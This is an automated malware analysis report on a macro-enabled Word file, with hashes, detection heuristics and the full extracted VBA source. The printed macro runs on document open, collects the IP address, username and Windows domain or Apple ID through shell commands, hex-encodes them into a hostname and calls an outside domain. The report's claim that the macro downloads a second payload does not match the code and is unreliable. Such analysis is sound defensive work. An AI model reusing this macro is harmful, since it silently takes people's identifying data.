Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b42cb0c75490854f…

MALICIOUS

Office (OOXML)

21.8 KB Created: 2018-03-29 10:29:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-11-25
MD5: 3f6fc68ac6346e010116730f5b828d47 SHA-1: 48643773e51734081a373782e2a8e3a4484173b7 SHA-256: b42cb0c75490854f90e70d175ac120fe8484af6960d12fc35b04602f36df3a89
378 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros with a Document_Open auto-execution macro. This macro utilizes WScript.Shell to construct and attempt to execute a URL, likely to download and run a secondary payload. The presence of the 'SE_ENABLE_LURE' heuristic indicates the document likely prompts the user to enable macros, a common social engineering tactic.

Heuristics 10

  • ClamAV: Doc.Malware.Valyria-10010011-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10010011-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Dim script As String
        RetVal = MacScript("do shell script ""route -n get default""")
        Interface = Split(Split(RetVal, vbCr)(4), ": ")(1)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim sArr() As String
        Set WshShell = VBA.CreateObject("WScript.Shell")
        Set oExec = WshShell.exec("ipconfig.exe")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim sArr() As String
        Set WshShell = VBA.CreateObject("WScript.Shell")
        Set oExec = WshShell.exec("ipconfig.exe")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        #If Mac Then
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Dim sUsername As String
        sUsername = Environ$("USER")
        Mac_Get_Username = sUsername
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6606 bytes
SHA-256: 2e188e110157f32231f8afed4df361b88370c096ebc23a6193761b82784912b1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    #If Mac Then
        ip = Module1.Mac_Get_IP
        username = Module1.Mac_Get_Username
        appid = Module1.Mac_Get_AppleID
        request = Module1.Mangle_Request(appid, username, ip, "M")
    #Else
        ip = Module1.Windows_Get_IP
        username = Module1.Windows_Get_Username
        domain = Module1.Windows_Get_Domain
        request = Module1.Mangle_Request(domain, username, ip, "W")
    #End If
    Module1.Trigger_Token (request)
End Sub


Attribute VB_Name = "Module1"
Option Explicit

Public Const BASE = ".lye04n5skx8tl4ter9la0r0t5.49d185155faa.o3n.io..................................................................................................."
Public Const EOS = "..."

Public Function Trigger_Token(request As String)
    On Error GoTo Err_Trigger
    Application.Documents.CanCheckOut ("http://" & request)
    
Err_Trigger:
    Exit Function
    
End Function

Public Function Mac_Get_IP() As String
    On Error GoTo Err_IP
    Dim RetVal As String
    Dim Interface As String
    Dim Length As Integer
    Dim script As String
    RetVal = MacScript("do shell script ""route -n get default""")
    Interface = Split(Split(RetVal, vbCr)(4), ": ")(1)
    RetVal = MacScript("do shell script ""ifconfig " + Interface + " inet""")
    Mac_Get_IP = Split(Split(RetVal, "inet ")(1), " ")(0)
    
Exit_IP:
    Exit Function

Err_IP:
    Mac_Get_IP = "none"
    Resume Exit_IP
End Function

Public Function Mac_Get_AppleID() As String
    On Error GoTo Err_AppleID
    Dim RetVal As String
    Dim script As String
    #If MAC_OFFICE_VERSION >= 15 Then
        Dim User As String
        Dim Email As String
        Dim EmailArr() As String
        Dim Length As Integer
        User = MacScript("do shell script ""id -un"" ")
        script = "do shell script ""dscl . -read /Users/" & User & " RecordName"""
        RetVal = MacScript(script)
        EmailArr = Split(RetVal, " ")
        Length = UBound(EmailArr) - LBound(EmailArr) + 1
        Dim i As Integer
        For i = 0 To Length - 1
            If EmailArr(i) Like "*@*" Then
                RetVal = EmailArr(i)
                Exit For
            End If
        Next i
    #Else
        script = "tell application " & Chr(34) & "Mail" & Chr(34) & _
        " to get email addresses of every account"
        RetVal = MacScript(script)
    #End If
    Mac_Get_AppleID = Trim(RetVal)

Exit_AppleID:
    Exit Function

Err_AppleID:
    Mac_Get_AppleID = "none"
    Resume Exit_AppleID
    
End Function

Public Function Mac_Get_Username() As String
    On Error GoTo Err_Username
    Dim sUsername As String
    sUsername = Environ$("USER")
    Mac_Get_Username = sUsername
    
Exit_Username:
    Exit Function

Err_Username:
    Mac_Get_Username = "none"
    Resume Exit_Username
    
End Function

Public Function Windows_Get_IP() As String
    On Error GoTo Err_IP
    Dim WshShell As Object
    Dim oExec As Object
    Dim sOutput As String
    Dim sArr() As String
    Set WshShell = VBA.CreateObject("WScript.Shell")
    Set oExec = WshShell.exec("ipconfig.exe")
    oExec.StdIn.Write "/a"
    sOutput = oExec.StdOut.ReadAll()
    sArr = Split(Split(Split(sOutput, "IPv4 Address")(1), ":")(1), " ")
    Windows_Get_IP = Replace(Replace(Trim(sArr(1)), Chr(10), ""), Chr(13), "")
    
Exit_IP:
    Exit Function
    
Err_IP:
    Windows_Get_IP = "none"
    Resume Exit_IP
    
End Function

Public Function Windows_Get_Username() As String
    On Error GoTo Err_Username
    Dim sUsername As String
    sUsername = Environ$("username")
    Windows_Get_Username = sUsername
    
Exit_Username:
    Exit Function
    
Err_Username:
    Windows_Get_Username = "none"
    Resume Exit_Username
End Function

Public Function Windows_Get_Domain() As String
    On Error GoTo Err_Domain
    Dim WshShell As Object
    Dim oExec As Object
    Dim sOutput As String
    Dim sArr() As String
    Dim sErr As String
    Set WshShell = VBA.CreateObject("WScript.Shell")
    Set oExec = WshShell.exec("whoami /upn")
    Do While oExec.Status = 0
        DoEvents
    Loop
    sOutput = oExec.StdOut.ReadAll()
    sErr = oExec.StdErr.ReadAll()
    If sErr Like "*ERROR*" Then
        Set oExec = WshShell.exec("whoami /user /NH")
        sOutput = oExec.StdOut.ReadAll()
        Windows_Get_Domain = Trim(Split(sOutput, "\")(0))
    Else
        Windows_Get_Domain = Trim(Split(sOutput, "@")(1))
    End If
    
Exit_Domain:
    Exit Function

Err_Domain:
    Windows_Get_Domain = "none"
    Resume Exit_Domain
    
End Function

Public Function Mangle_Request(ByVal userData As String, ByVal username As String, ByVal ip As String, ByVal os As String) As String
    Dim sRequest As String
    Dim sMaxLength As Long
    Dim reducedBase As String
    reducedBase = Left(BASE, InStr(BASE, EOS) - 1)
    sRequest = EncodeHex(username, "") & ".u" & os & "." & EncodeHex(ip, "") & ".MW" & reducedBase
    sMaxLength = 250 - Len(sRequest)
    If Len(userData) > 0 Then
        sRequest = AddExtra(userData, sMaxLength) & ".d." & sRequest
    Else
        sRequest = EncodeHex("none", "") & ".d." & sRequest
    End If
    Mangle_Request = sRequest
End Function

Private Function AddExtra(userData As String, sMaxLength As Long) As String
    Dim i As Long
    Dim enLen As Long
    Dim sTestUrl As String
    Dim encoded As String
    Do
        sTestUrl = ""
        encoded = EncodeHex(userData, "")
        i = 1
        enLen = Len(encoded)
        Do While i < enLen
            If i + 62 > enLen Then
                sTestUrl = sTestUrl & Mid(encoded, i, enLen)
            Else
                sTestUrl = sTestUrl & Mid(encoded, i, 63) & "."
            End If
            i = i + 62
        Loop
        If Len(sTestUrl) <= sMaxLength Then
            Exit Do
        End If
        userData = Left(userData, Len(userData) - 2)
    Loop
    AddExtra = sTestUrl
End Function

Private Function EncodeHex(sData As String, Optional HexPrefix As String = "0x") As String
    Dim iChar As Integer
    Dim sOutString As String
    Dim sTmpChar As String
    sOutString = ""
    For iChar = 1 To Len(sData)
        sTmpChar = Hex$(Asc(Mid(sData, iChar, 1)))
        If Len(sTmpChar) = 1 Then sTmpChar = "0" & sTmpChar
        sOutString = sOutString & sTmpChar
    Next iChar
    EncodeHex = sOutString
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 22016 bytes
SHA-256: da6d31c8a750aabe90c47e2174d6b4970bec4a772f60e518f0adba5dfe853106
Detection
ClamAV: Doc.Malware.Valyria-10010011-0
Obfuscation or payload: unlikely